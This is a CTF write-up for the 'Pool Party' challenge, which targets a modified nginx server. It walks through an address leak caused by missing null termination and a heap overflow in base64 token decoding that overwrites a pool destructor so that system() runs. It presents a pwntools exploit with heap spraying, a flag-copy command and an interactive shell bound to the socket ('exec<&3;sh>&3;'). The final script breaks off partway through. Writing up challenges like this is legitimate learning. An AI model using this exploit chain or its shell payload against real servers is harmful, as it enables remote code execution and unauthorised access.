Platypwn 2025 - Pool Party

Pool Party: nginx pool exploitation

Pool Party

“brrrrrrr” said the Platypus. It’s warm outside the water. “Time for a pool party”, it thinks. It has been a while since it met its fellow platypuses and a pool party is a clever idea to reunite. The Platypus decides to host a webserver to store the plans and figures that nginx is a good fit because it’s fast - almost as fast as the Platypus can use its 40000 electroreceptors on the bill to detect prey.

TL;DR

This challenges requires exploiting a modified nginx (/ɛn dʒɪŋks/, "en jinks") binary which added a handful of new functions, which can be found through the ngx_http_pp_ prefix.

We can exploit a Heap BOF (Buffer OverFlow) through missing size checks in the nginx function ngx_decode_base64 to overwrite a destructor inside the nginx Pool struct and get RIP & RDI control, which we use to extract the flag.

Overview

The first interesting thing about this challenge is that we don't get any attached files, which worried me for a bit, but after starting the instance we are immediately greeted with a nginx directory enumeration page that includes seemingly all the challenge files, so lets go through them.

.
|-- Dockerfile
|-- compose.yaml
|-- entrypoint.sh
|-- libc.so.6
|-- nginx.conf
`-- nginx

First of all we have the Dockerfile which installed the relevant dependencies and setups the correct file structure and users. It also defines what to execute on startup, which seems to be some entrypoint which will probably execute nginx -g "daemon off;" -c ./nginx.conf

Dockerfile

FROM ubuntu@sha256:35f3a8badf2f74c1b320a643b343536f5132f245cbefc40ef802b6203a166d04

RUN apt-get update && apt-get install -y zlib1g gdbserver \
    && rm -rf /var/lib/apt/lists/* \
    && groupadd -r ctf && useradd -r -g ctf ctf

USER ctf

WORKDIR /nginx
# Create directories for nginx
RUN mkdir modules conf logs

WORKDIR /challenge
COPY nginx.conf .
COPY --chmod=755 entrypoint.sh /entrypoint.sh
COPY --chmod=755 nginx .

ENTRYPOINT [ "/entrypoint.sh" ]
CMD ["/challenge/nginx", "-g", "daemon off;", "-c", "/challenge/nginx.conf"]

The entrypoint.sh just setups the flag file (without removing it from environ) and executes the provided CMD.

entrypoint.sh

#!/bin/sh

if [ -z "$FLAG" ]; then
    echo "FLAG must be set"
    exit 1
fi

echo "$FLAG" > /nginx/flag.txt

while true; do
    "$@"
done

And the compose.yaml just sets the flag and adds port forwarding. They also added the capability SYS_PTRACE, which we don't really need, but could be exploited for container escape. Also note that this isn't really needed as PTRACE_TRACEME doesn't need that capability and is used by gdbserver. One interesting thing though is that personality ADDR_NO_RANDOMIZE (disabling ASLR for one process only) can't be activated inside a docker container, without changing the seccomp sandbox json.

compose.yaml

services:
  poolparty:
    build: .
    ports:
      - "8080:8080"
    environment:
      - FLAG=PP{testflag}
    # Could be helpful for local debugging
    cap_add:
      - SYS_PTRACE

We also get the nginx configuration file nginx.conf, which seems to execute some custom nginx methode called platypus for the URLs /party and /restart.

nginx.conf

worker_processes 1;
events {}
error_log /dev/stderr;

http {
    server {
        listen 8080;
        access_log /dev/stdout;
        location / {
            alias /challenge/;
            autoindex on;
        }

        location /party {
            platypus;
        }

        location /restart {
            platypus;
        }
    }
}

And last but not least we have the nginx binary file nginx, which seems to be a nginx server (even though slightly patched to add new functionality).

$ vagd info nginx
Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No
Comment:    GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0

Reversed Code:

int64_t ngx_http_pp_send_response_raw(int64_t arg1, int64_t arg2, int64_t arg3, void* arg4)

{
    void* fsbase;
    int64_t rax = *(uint64_t*)((char*)fsbase + 0x28);
    int64_t* rax_3 = ngx_palloc(*(uint64_t*)((char*)arg4 + 0x58), 0x50);
    int64_t result;

    if (rax_3)
    {
        *(uint64_t*)rax_3 = arg1;
        rax_3[1] = *(uint64_t*)rax_3 + arg2;
        rax_3[9] |= 2;
        rax_3[9] |= 0x80;
        int64_t* var_28 = rax_3;
        int64_t var_20_1 = 0;
        *(uint64_t*)((char*)arg4 + 0x210) = arg3;
        *(uint64_t*)((char*)arg4 + 0x2d8) = arg2;
        *(uint64_t*)((char*)arg4 + 0x2a8) = 0xa;
        *(uint64_t*)((char*)arg4 + 0x2b0) = "text/plain";
        int64_t result_1;

        if (!(*(uint8_t*)((char*)arg4 + 0x453) & 2))
            result_1 = ngx_http_send_header(arg4);

        if (*(uint8_t*)((char*)arg4 + 0x453) & 2 || !result_1)
        {
            int64_t result_2 = ngx_http_output_filter(arg4, &var_28);

            result = !result_2 ? 0 : result_2;
        }
        else
            result = result_1;
    }
    else
        result = -1;

    *(uint64_t*)((char*)fsbase + 0x28);

    if (rax == *(uint64_t*)((char*)fsbase + 0x28))
        return result;

    __stack_chk_fail();
    /* no return */
}


int64_t ngx_http_pp_send_response(char* msg, int64_t code, void* arg3)

{
    return ngx_http_pp_send_response_raw(msg, strlen(msg), code, arg3);
}


int64_t ngx_http_pp_cmd(void* arg1)

{
    int64_t rsi;
    int64_t var_28 = rsi;
    int64_t rdx;
    int64_t var_30 = rdx;
    **(uint64_t**)(*(uint64_t*)(*(uint64_t*)((char*)arg1 + 0x38) + 0x10)
        + (ngx_http_pp_module << 3)) = 1;
    *(uint64_t*)(*(uint64_t*)(*(uint64_t*)(*(uint64_t*)((char*)arg1 + 0x38) + 0x10)
        + (ngx_http_core_module << 3)) + 0x48) = ngx_http_pp_handler;
    return 0;
}


int64_t ngx_http_pp_party_get(void* arg1)

{
    if (party)
        return ngx_http_pp_send_response("Party is in progress", 200, arg1);

    return ngx_http_pp_send_response("Party is not in progress", 404, arg1);
}


int64_t ngx_http_pp_party_post(void* arg1)

{
    if (party)
        return ngx_http_pp_send_response("Party is already in progress", 0x195, arg1);

    party =
        ngx_create_pool(0x1000, *(uint64_t*)(*(uint64_t*)((char*)arg1 + 0x58) + 0x48));
    return ngx_http_pp_send_response("Party started", 200, arg1);
}


void* ngx_http_pp_party_add(uint64_t arg1)

{
    if (!*(uint64_t*)(arg1 + 0x2f8))
        return ngx_http_finalize_request(arg1, 0x1f4);

    int64_t count = 0;

    for (int64_t* i = *(uint64_t*)(*(uint64_t*)(arg1 + 0x2f8) + 8); i; i = i[1])
    {
        int64_t rax_24;

        if (*(uint8_t*)(*(uint64_t*)i + 0x48) & 1
                || *(uint8_t*)(*(uint64_t*)i + 0x48) & 2
                || *(uint8_t*)(*(uint64_t*)i + 0x48) & 4)
            rax_24 = *(uint64_t*)(*(uint64_t*)i + 8) - **(uint64_t**)i;
        else
            rax_24 = *(uint64_t*)(*(uint64_t*)i + 0x18)
                - *(uint64_t*)(*(uint64_t*)i + 0x10);

        count += rax_24;
    }

    char* platypus = ngx_palloc(party, 0x100);  // platypus

    if (platypus)
        return ngx_http_finalize_request(arg1, 
            ngx_http_pp_send_response_raw(platypus, 
                ngx_sprintf(platypus, "%z platypuses added to the party", count, 
                    "%z platypuses added to the party") - platypus, 
                201, arg1));

    return ngx_http_finalize_request(arg1, 500);
}


int64_t ngx_http_pp_party_put(void* arg1)

{
    if (!party)
        return ngx_http_pp_send_response(
            "You can't add Platypus to a non-existent party", 0x195, arg1);

    int64_t result = ngx_http_read_client_request_body(arg1, ngx_http_pp_party_add);

    if (result <= 0x12b)
        return -4;

    return result;
}


int64_t ngx_http_pp_party_delete(void* arg1)

{
    if (!party)
        return ngx_http_pp_send_response("Party is not in progress", 0x195, arg1);

    ngx_destroy_pool(party);
    party = 0;
    return ngx_http_pp_send_response("Party ended", 0xc8, arg1);
}


int64_t ngx_http_pp_handler(void* arg1)

{
    if (!strncmp(*(uint64_t*)((char*)arg1 + 0x340), "/party", 6))
    {
        if (*(uint64_t*)((char*)arg1 + 0x318) == 2)
            return ngx_http_pp_party_get(arg1);

        if (*(uint64_t*)((char*)arg1 + 0x318) == 8)
            return ngx_http_pp_party_post(arg1);

        if (*(uint64_t*)((char*)arg1 + 0x318) == 0x10)
            return ngx_http_pp_party_put(arg1);

        if (*(uint64_t*)((char*)arg1 + 0x318) == 0x20)
            return ngx_http_pp_party_delete(arg1);
    }

    if (strncmp(*(uint64_t*)((char*)arg1 + 0x340), "/restart", 8))
        return ngx_http_pp_send_response("There is no party here", 0x194, arg1);

    system("pkill nginx");
    return 0xc8;
}


int64_t ngx_http_pp_access_check(void* arg1)

{
    void* fsbase;
    int64_t rax = *(uint64_t*)((char*)fsbase + 0x28);
    int64_t result;

    if (!**(uint64_t**)(*(uint64_t*)((char*)arg1 + 0x28) + (ngx_http_pp_module << 3)))
        result = -5;
    else if (*(uint64_t*)((char*)arg1 + 0x138))
    {
        void* val = *(uint64_t*)((char*)arg1 + 0x138);
        int32_t rax_13;

        if (*(uint64_t*)((char*)val + 0x18) >= 7)
            rax_13 = strncmp(*(uint64_t*)((char*)val + 0x20), "Bearer ", 7);

        if (*(uint64_t*)((char*)val + 0x18) >= 7 && !rax_13)
        {
            char* rax_16 = ngx_palloc(*(uint64_t*)((char*)arg1 + 0x58), 0x1000);

            if (rax_16)
            {
                int64_t var_38 = *(uint64_t*)((char*)val + 0x18) - 7;
                int64_t var_30_1 = 7 + *(uint64_t*)((char*)val + 0x20);
                int64_t var_28 = 0x1000;
                char* var_20_1 = rax_16;

                if (!ngx_decode_base64(&var_28, &var_38))
                {
                    if (!strncmp(rax_16, "ornithorhynchus anatinus", 0x18))
                        result = -5;
                    else
                    {
                        char* rax_27 =
                            ngx_palloc(*(uint64_t*)((char*)arg1 + 0x58), 0x40);

                        if (rax_27)
                        {
                              memcpy(&rax_16[0x2a], "...", 4);
                            result = ngx_http_pp_send_response_raw(rax_27, 
                                ngx_sprintf(rax_27, "Token invalid: %s", rax_16, 
                                    "Token invalid: %s") - rax_27, 
                                0x191, arg1);
                        }
                        else
                            result = 0x1f4;
                    }
                }
                else
                    result = ngx_http_pp_send_response("Invalid token", 0x191, arg1);
            }
            else
                result = 0x1f4;
        }
        else
            result = 0x191;
    }
    else
        result = 0x191;

    *(uint64_t*)((char*)fsbase + 0x28);

    if (rax == *(uint64_t*)((char*)fsbase + 0x28))
        return result;

    __stack_chk_fail();
    /* no return */
}


int64_t ngx_http_pp_postconfiguration(void* arg1)

{
    int64_t (** rax_7)(void* arg1) = ngx_array_push(
        *(uint64_t*)(**(uint64_t**)((char*)arg1 + 0x38) + (ngx_http_core_module << 3))
        + 0x1d8);

    if (!rax_7)
        return -1;

    *(uint64_t*)rax_7 = ngx_http_pp_access_check;
    return 0;
}


int64_t* ngx_http_pp_create_loc_conf(void* arg1)

{
    int64_t* result = ngx_pcalloc(*(uint64_t*)((char*)arg1 + 0x18), 8);

    if (!result)
        return nullptr;

    *(uint64_t*)result = -1;
    return result;
}


int64_t ngx_http_pp_merge_loc_conf(int64_t arg1, int64_t* arg2, int64_t* arg3)

{
    int64_t var_20 = arg1;

    if (*(uint64_t*)arg3 == -1)
    {
        int64_t rax_7;

        if (*(uint64_t*)arg2 == -1)
            rax_7 = 0;
        else
            rax_7 = *(uint64_t*)arg2;

        *(uint64_t*)arg3 = rax_7;
    }

    return 0;
}

The relevant execution flow looks like this:

ngx_http_pp_access_check
└►ngx_http_pp_handler
  ├►ngx_http_pp_party_get
  ├►ngx_http_pp_party_post
  ├►ngx_http_pp_party_delete
  └►ngx_http_pp_party_put
    └►ngx_http_pp_party_add

To start exploiting we can create a basic template using this command

vagd template ./nginx 10.80.11.174 8080 -e --libs --image ubuntu@sha256:35f3a8badf2f74c1b320a643b343536f5132f245cbefc40ef802b6203a166d04

and then add some setup code

  if not vm:
    vm = Dogd(BINARY, image=BOX, symbols=True, libs=True, ex=True, fast=True,   
              files=['./nginx.conf'], packages=['zlib1g'], forward={'8080/tcp': 8080})  # Docker
  if vm.is_new:
    # additional setup here
    vm.system('sudo mkdir /nginx').recvall()
    vm.system('sudo chown vagd:sudo /nginx').recvall()
    vm.system('sudo mkdir /challenge').recvall()
    vm.system('sudo chown vagd:sudo /challenge').recvall()
    vm.system('mkdir /nginx/modules /nginx/conf /nginx/logs').recvall()
    vm.system('echo NOT_THE_FLAG > /nginx/flag.txt').recvall()
  else:
    vm.system('pkill nginx').recvall()
    vm.system('rm /challenge/flag.txt').recvall()

Vulnerabilities

Let's try to go through the code and find some vulnerabilities. The implemented HTTP method actually seem rather safe, notably because we don't really have a lot of user control. We can simply create a nginx memory pool party through POST, add new entries through PUT, which simply store %z platypuses added to the party, with %z being the content length, in a 0x100 sized buffer in the allocated memory pool party and finally delete the memory pool party which also deletes all related entries. Also GET simply returns if the party pool is currently allocated or not.

There actually isn't any conventional Heap vulnerability here, we don't have a double free, use after free or buffer overflow. Also we don't really have any user controllable parameters here.

So let's look at the only other promising part, ngx_http_pp_access_check:

This code seemingly checks for the existence of a Authorization header and access token, which should be base64 encoded ornithorhynchus anatinus (scientific name for platypus), but actually isn't done correctly and any token would work (this seems to be a oversight of the author). If we ignore CONTENT_LENGTH we actually receive more data afterwards, which correlates to the HTTP methods.

After the check ngx_http_pp_handler executes the correlated HTTP method.

ASLR Leaks

The first interesting issue is that ngx_http_pp_access_check allocates a buffer of size 0x1000 with char* token = ngx_palloc(request_pool, 0x1000); and then calls ngx_decode_base64(token, token_b64) (a function for which I didn't find any documentation online). Also if the token is invalid, the decoded token is returned after ngx_sprintf(buffer, "Token invalid: %s", token), this is interesting as we never enforce null byte termination. And by writing a simple PoC, we actually get a libc leak:

invalid_token = flat(b'Authorization: Bearer ', b64e(b'x').encode(), b'\r\n')
se(build_header('/party', 'GET', headers=[invalid_token]))
it()

So why does this happen? Let's try to understand how nginx pools work:

nginx pools

So how exactly do nginx pools work?

Let's allocate a memory pool using POST /party, allocate some parties using PUT and then look how the heap looks on follow up executions.

token = flat(b'Authorization: Bearer ', b64e(b'ornithorhynchus anatinus').encode(), b'\r\n')
se(build_header('/party', 'POST', headers=[token]))
ru(b'\r\n\r\n')

data = cyc(0x6f)
for i in range(0x8):
  se(build_header('/party', 'PUT', data, headers=[token]) + data)
  ru(b'\r\n\r\n')

se(build_header('/party', 'DELETE', headers=[token]))
ru(b'\r\n\r\n')
it()

The first thing you might notice is that using the pwndbg heap command actually doesn't work and tries to enumerate the heap from the wrong starting address:

pwndbg> heap
Addr: 0x5555556d3010
Size: 0x00 (with flag bits: 0x00)

But we can easily fix this by specifying the correct heap start 0x555555691000. This also confirms that nginx pools seem to be some abstraction layer above the libc allocator (in this case glibc ptmalloc) that chain multiple allocation together through pools.

pwndbg> heap 0x555555691000
Allocated chunk | PREV_INUSE
Addr: 0x555555691000
Size: 0x290 (with flag bits: 0x291)

...

Allocated chunk | PREV_INUSE
Addr: 0x555555697ce0
Size: 0x1010 (with flag bits: 0x1011)

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x555555698cf0
Size: 0x2020 (with flag bits: 0x2021)
fd: 0x7ffff7f54b20
bk: 0x7ffff7f54b20

Allocated chunk
Addr: 0x55555569ad10
Size: 0x1010 (with flag bits: 0x1010)

...

setting the correct breakpoints we actually see that 0x555555697ce0 is the buffer we allocated for the decoded authorization token.

tel 0x555555697cf0
00:0000│  0x555555697cf0 ◂— 0x726f6874696e726f ('ornithor')
01:0008│  0x555555697cf8 ◂— 0x20737568636e7968 ('hynchus ')
02:0010│  0x555555697d00 ◂— 0x73756e6974616e61 ('anatinus')

Also adjacent chunk is actually used for the memory pool 0x55555569ad10 which we can confirm because the PUT allocations are actually stored there:

pwndbg> search "111 platypuses added"
Searching for byte: b'111 platypuses added'
[heap]          0x55555569ad70 '111 platypuses added to the party'
[heap]          0x55555569ae70 '111 platypuses added to the party'
[heap]          0x55555569af70 '111 platypuses added to the party'
[heap]          0x55555569b070 '111 platypuses added to the party'
[heap]          0x55555569b170 '111 platypuses added to the party'
[heap]          0x55555569b270 '111 platypuses added to the party'
[heap]          0x55555569b370 '111 platypuses added to the party'
[heap]          0x55555569b470 '111 platypuses added to the party'

Excluding the heap header, we see that some sort of metadata is stored at the top of the memory pool, which will be important for exploitation.

pwndbg> tel 0x55555569ad20 12
00:0000│  0x55555569ad20 —▸ 0x55555569b570 ◂— 0
01:0008│  0x55555569ad28 —▸ 0x55555569bd20 ◂— 0
02:0010│  0x55555569ad30 ◂— 0
03:0018│  0x55555569ad38 ◂— 0
04:0020│  0x55555569ad40 ◂— 0xfb0
05:0028│  0x55555569ad48 —▸ 0x55555569ad20 —▸ 0x55555569b570 ◂— 0
06:0030│  0x55555569ad50 ◂— 0
... ↓     2 skipped
09:0048│  0x55555569ad68 —▸ 0x555555691fa0 ◂— 4
0a:0050│  0x55555569ad70 ◂— '111 platypuses added to the party'
0b:0058│  0x55555569ad78 ◂— 'ypuses added to the party'

So knowing that we are dealing with glibc ptmalloc, our leak is due to a large bin leaking it's linked list through uninitialised memory. So knowing this we can modify our PoC to also leak heap:

leak_libc_token = flat(b'Authorization: Bearer ', b64e(b'x').encode(), b'\r\n')
leak_heap_token = flat(b'Authorization: Bearer ', b64e(cyc(0x11)).encode(), b'\r\n')

se(build_header('/party', 'GET', headers=[leak_libc_token]))
ru(b'invalid: x')
libc.address = (upad(ru(b'Party', drop=True)) << 8) - 0x204200
lhex(libc.address, "libc")

se(build_header('/party', 'GET', headers=[leak_heap_token]))
ru(b'invalid: ' + cyc(0x11))
HEAP = (upad(ru(b'Party', drop=True)) << 8)
lhex(HEAP, "heap")

Heap BOF

So now we have ASLR leaks, but how to we get RCE? Remembering the execution, we see that we allocated a buffer of size 0x1000 for the decoded token, but what happens if we send more than that?

se(build_header('/party', 'POST', 
                headers=[b'Authorization: Bearer ', b64e(cyc(0x2000)).encode(), b'\r\n']))
ru(b'\r\n\r\n')

Well sadly we get:

<html>
<head><title>400 Request Header Or Cookie Too Large</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>Request Header Or Cookie Too Large</center>
<hr><center>nginx/1.28.0</center>
</body>
</html>

Ok, but what happens if only send slight more

se(build_header('/party', 'POST', 
                headers=[b'Authorization: Bearer ', b64e(cyc(0x1200)).encode(), b'\r\n']))
ru(b'\r\n\r\n')

That's a bingo! We have a heap BOF:

pwndbg> heap 0x555555691000
...
Allocated chunk | PREV_INUSE
Addr: 0x55555569bd10
Size: 0x1010 (with flag bits: 0x1011)

Free chunk (unsortedbin) | IS_MMAPED
Addr: 0x55555569cd20
Size: 0x6164706261637060 (with flag bits: 0x6164706261637062)
fd: 0x6166706261657062
bk: 0x6168706261677062
...

and shortly after we trigger a exception: malloc(): invalid size (unsorted) triggering SIGABRT.

So what if we try to allocate something into the unsorted bin, through our memory pool, then trigger the BOF?

se(build_header('/party', 'POST', headers=[token]))
ru(b'\r\n\r\n')

bof = flat({
  0x1010: [
    0x1020, 
    0x1011,
  ],               
}, length=0x1200)

se(build_header('/party', 'POST', 
                headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
ru(b'\r\n\r\n')

Interesting we don't crash, now let's try to free the corrupted memory pool with DELETE.

se(build_header('/party', 'DELETE', headers=[token]))
ru(b'\r\n\r\n')

Interesting, we try to dereference RAX, which we control through our BOF and if it isn't zero we EXECUTE it with OFFSET 8 BEING RDI!!!

──────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────
 RAX  0x617a706261797062 ('bpyabpza')
───────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────
  0x555555571815 <ngx_destroy_pool+34>    mov    rax, qword ptr [rax]     <Cannot dereference [0x617a706261797062]>
   0x555555571818 <ngx_destroy_pool+37>    test   rax, rax
   0x55555557181b <ngx_destroy_pool+40>    je     ngx_destroy_pool+62         <ngx_destroy_pool+62>

   0x55555557181d <ngx_destroy_pool+42>    mov    rax, qword ptr [rbp - 8]
   0x555555571821 <ngx_destroy_pool+46>    mov    rdx, qword ptr [rax]
   0x555555571824 <ngx_destroy_pool+49>    mov    rax, qword ptr [rbp - 8]
   0x555555571828 <ngx_destroy_pool+53>    mov    rax, qword ptr [rax + 8]
   0x55555557182c <ngx_destroy_pool+57>    mov    rdi, rax
   0x55555557182f <ngx_destroy_pool+60>    call   rdx
────────────────────────────────────[ DECOMP ]─────────────────────────────────────
   0x555555571842 <ngx_destroy_pool+79>  for (int64_t* i = *(arg1 + 0x40); i != 0; i = i[2])
  0x55555557181b <ngx_destroy_pool+40>      if (*i != 0)
   0x55555557182f <ngx_destroy_pool+60>          (*i)(i[1])
───────────────────────────────────[ BACKTRACE ]───────────────────────────────────
  0   0x555555571815 ngx_destroy_pool+34
   1   0x55555563f8fe ngx_http_pp_party_delete+72
   2   0x55555563f9e0 ngx_http_pp_handler+186
───────────────────────────────────────────────────────────────────────────────────

So basically all we have to do is set RAX to a controlled region inside our heap, and fill it with [system, "CMD TO EXECUTE;"]

Exploitation

So naturally we modify our exploit to call system("CMD") which works locally.

se(build_header('/party', 'POST', headers=[token]))
ru(b'\r\n\r\n')

CMD = b'cp /nginx/flag.txt /challenge/flag.txt;'
bof = flat({
  0: [
    libc.sym.system,
    HEAP+OFF+0x10,
  ],
  0x10: CMD
  0x1010: [
    0x1020, 
    0x1011,
  ],
  0x1010+0x50: HEAP+OFF              
}, length=0x1200)

se(build_header('/party', 'POST', 
                headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
ru(b'\r\n\r\n')
se(build_header('/party', 'DELETE', headers=[token]))
ru(b'\r\n\r\n')

Sadly though when we try to run it against the remote instance it doesn't work :(. This seems to happens because we have a different Heap offset. So let's try to run it against the locally running instance with compose.yaml. Now we notice something even worse: We have a different heap offset once again! Adjusting for the heap base we get:

  HEAP -= (0x9200 if args.LOCAL else 0x9400) if args.REMOTE else 0x8d00

This happens even though we restart the nginx binary (and therefore heap) before running the exploit:

se(build_header('/restart', 'GET', headers=[token]))
cl()

So how do we fix this? Luckily the offsets don't seem too big between REMOTE and local execution. Additionally we know that the BOF is relative (so no issues there) and we have about 0x1000 bytes to spray the data we need. Also all the offsets are at least 0x10 aligned. So we use the first 0x800 bytes to spray our CMD payload, and the next 0x800 to spray the RIP+RDI control struct:

  cmd = b'cp /nginx/flag.txt /challenge/flag.txt;'

  OFF = 0x9000+0x200*i
  bof = flat({
    0x00: cmd*((0x800//len(cmd))),
    0x800: [libc.sym.system, HEAP + OFF]*0x80,
    0x1010: [
      0x1020, 
      0x1011,
      [HEAP + OFF + 0x800] * 0x10
    ],       
    0x1010+0x50: [HEAP + OFF + 0x800]
  }, length=0x1200)

  # c 2 
  se(build_header('/party', 'POST', 
                  headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
  ru(b'\r\n\r\n')

Now all we have left to do is retrieve the flag:

  t = get_target() if args.REMOTE else remote('localhost', 8080) 
  se(build_header('/flag.txt', 'GET', headers=[token]))
  ru(b'\r\n\r\n')
  flag = rls(t)
  print(flag)

Getting Shell

After the CTF ended I played around with this challenge (and fileserver) to try and get an interactive shell through the open socket. In the fileserver challenge, we extracted the flag like this ./readflag>&5;, which basically uses the sh syntax to forward output (from stdout) to file descriptor 5 (which is our client socket). So naturally I tried something like this sh>&5<&5; to get a fully interactive shell, which sadly didn't work and throws the error: sh: 1: Syntax error: redirection unexpected

But from testing I saw that sh<&5; works, and we can extract data by e.g. executing id >&5;. This is a bit cumbersome, so after some research I found that you can setup persistent pipes with exec >out.log. Using this information I can now setup a global pipe exec>&5; and a temporary one with the shell command sh<&5; and I get a fully interactive shell through the open socket (without requiring e.g. outgoing internet connections like for reverse shells). Combined we execute exec>&5;sh<&5;

Now we can port this technique to our nginx server. One easy way to find out the correct file descriptors is to either halt the process using gdb, or execute sleep inf; and enumerate the file descriptors using sudo ls -l /proc/PID/fd. Here we can see that fd 3 is the client socket fd and 6 probably the binded socket, which we conclude through the higher (client socket) and lower (bind socket) inode number.

sudo ls -l /proc/$(pgrep -f "sleep inf")/fd
lrwx------ 1 999 999 64 Nov 21 13:39 0 -> /dev/null
l-wx------ 1 999 999 64 Nov 21 13:39 1 -> 'pipe:[182217]'
l-wx------ 1 999 999 64 Nov 21 13:39 2 -> 'pipe:[182218]'
lrwx------ 1 999 999 64 Nov 21 13:39 3 -> 'socket:[249876]'
lrwx------ 1 999 999 64 Nov 21 13:39 6 -> 'socket:[246975]'
lrwx------ 1 999 999 64 Nov 21 13:39 8 -> 'anon_inode:[eventpoll]'
lrwx------ 1 999 999 64 Nov 21 13:39 9 -> 'anon_inode:[eventfd]'

and we get a interactive shell:

  cmd = b'exec<&3;sh>&3;'

  OFF = 0x9000+0x200*i
  bof = flat({
    0x00: cmd*((0x800//len(cmd))),
    0x800: [libc.sym.system, HEAP + OFF]*0x80,
    0x1010: [
      0x1020, 
      0x1011,
    ],       
    0x1010+0x50: [HEAP + OFF + 0x800]
  }, length=0x1200)

  # c 2 
  se(build_header('/party', 'POST', 
                  headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
  ru(b'\r\n\r\n')

  se(build_header('/party', 'DELETE', headers=[token]))
  try:
    sl('echo PWN; id; cat /nginx/flag.txt;')
    ru('PWN')
    it()
  except EOFError:
    cl()
    continue

Note: as it is important that both commands get executed in order so we need change the order to exec<&3;sh>&3; making sh terminate if stdout doesn't exist due to the missing pipe and stdin being /dev/null by default. Alternatively we can spray a command sled (e.g. true;) and at the end execute the payload.

Final Exploit

exploit.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ vagd template ./nginx 10.80.11.174 8080 -e --libs --image ubuntu@sha256:35f3a8badf2f74c1b320a643b343536f5132f245cbefc40ef802b6203a166d04
from pwn import *


GOFF   = 0x555555554000                               # GDB default base address
IP     = '127.0.00.1' if args.LOCAL else '127.0.00.1' # remote IP
PORT   = 8081 if args.LOCAL else 8080                 # remote PORT
BINARY = './nginx'                                    # PATH to local binary
ARGS   = ['-g', 'daemon off;', '-c', '/home/vagd/nginx.conf']  # ARGS supplied to binary
ENV    = {}                                           # ENV supplied to binary
BOX    = 'ubuntu@sha256:35f3a8badf2f74c1b320a643b343536f5132f245cbefc40ef802b6203a166d04' # Docker box image

# GDB SCRIPT, executed at start of GDB session (e.g. set breakpoints here)
GDB    = f"""
set follow-fork-mode child

hb * system

c"""

context.binary = exe = ELF(BINARY, checksec=False)    # binary
context.aslr = False                                  # ASLR enabled (only GDB)

# abbreviations
cst = constants
shc = shellcraft

# logging
linfo = lambda x, *a: log.info(x, *a)
lwarn = lambda x, *a: log.warn(x, *a)
lerr  = lambda x, *a: log.error(x, *a)
lprog = lambda x, *a: log.progress(x, *a)
lhex  = lambda x, y="leak": linfo(f"{x:#018x} <- {y}")
phex  = lambda x, y="leak": print(f"{x:#018x} <- {y}")

# type manipulation
byt   = lambda x: x if isinstance(x, (bytes, bytearray)) else f"{x}".encode()
rpad  = lambda x, s=8, v=b"\0": x.ljust(s, v)
lpad  = lambda x, s=8, v=b"\0": x.rjust(s, v)
hpad  = lambda x, s=0: f"%0{s if s else ((x.bit_length() // 8) + 1) * 2}x" % x
upad  = lambda x: u64(rpad(x))
cpad  = lambda x, s: byt(x) + cyc(s)[len(byt(x)):]
tob   = lambda x: bytes.fromhex(hpad(x))

# elf aliases
gelf  = lambda elf=None: elf if elf else exe
srh   = lambda x, elf=None: gelf(elf).search(byt(x)).__next__()
sasm  = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).__next__()
lsrh  = lambda x: srh(x, libc)
lasm  = lambda x: sasm(x, libc)

# cyclic aliases
cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

# tube aliases
t   = None
gt  = lambda at=None: at if at else t
sl  = lambda x, t=None, *a, **kw: gt(t).sendline(byt(x), *a, **kw)
se  = lambda x, t=None, *a, **kw: gt(t).send(byt(x), *a, **kw)
ss  = (
        lambda x, s, t=None, *a, **kw: sl(x, t, *a, **kw)
        if len(x) < s
        else se(x, *a, **kw)
          if len(x) == s
          else lerr(f"ss to big: {len(x):#x} > {s:#x}")
      )
sla = lambda x, y, t=None, *a, **kw: gt(t).sendlineafter(
        byt(x), byt(y), *a, **kw
      )
sa  = lambda x, y, t=None, *a, **kw: gt(t).sendafter(byt(x), byt(y), *a, **kw)
sas = (
        lambda x, y, s, t=None, *a, **kw: sla(x, y, t, *a, **kw)
        if len(y) < s
        else sa(x, y, *a, **kw)
          if len(y) == s
          else lerr(f"ss to big: {len(x):#x} > {s:#x}")
      )
ra  = lambda t=None, *a, **kw: gt(t).recvall(*a, **kw)
rl  = lambda t=None, *a, **kw: gt(t).recvline(*a, **kw)
rls = lambda t=None, *a, **kw: rl(t=t, *a, **kw)[:-1]
rcv = lambda x, t=None, *a, **kw: gt(t).recv(x, *a, **kw)
ru  = lambda x, t=None, *a, **kw: gt(t).recvuntil(byt(x), *a, **kw)
it  = lambda t=None, *a, **kw: gt(t).interactive(*a, **kw)
cl  = lambda t=None, *a, **kw: gt(t).close(*a, **kw)


# setup vagd vm
vm = None
def setup():
  global vm
  if args.REMOTE or args.LOCAL:
    return None

  try:
    # only load vagd if needed
    from vagd import Dogd, Box
  except ModuleNotFoundError:
    log.error('Failed to import vagd, run LOCAL/REMOTE or install it')
  if not vm:
    vm = Dogd(BINARY, image=BOX, symbols=True, libs=True, ex=True, fast=True,   
              files=['./nginx.conf'], packages=['zlib1g'], forward={'8080/tcp': 8080})  # Docker
  if vm.is_new:
    # additional setup here
    vm.system('sudo mkdir /nginx').recvall()
    vm.system('sudo chown vagd:sudo /nginx').recvall()
    vm.system('sudo mkdir /challenge').recvall()
    vm.system('sudo chown vagd:sudo /challenge').recvall()
    vm.system('mkdir /nginx/modules /nginx/conf /nginx/logs').recvall()
    vm.system('echo NOT_THE_FLAG > /nginx/flag.txt').recvall()
  else:
    vm.system('pkill nginx').recvall()
    vm.system('rm /challenge/flag.txt').recvall()


  return vm


# get target (pwnlib.tubes.tube)
def get_target(**kw):
  if args.REMOTE:
    # context.log_level = 'debug'
    return remote(IP, PORT)

  if args.LOCAL:
    if args.GDB:
      return gdb.debug([BINARY] + ARGS, env=ENV, gdbscript=GDB, **kw)
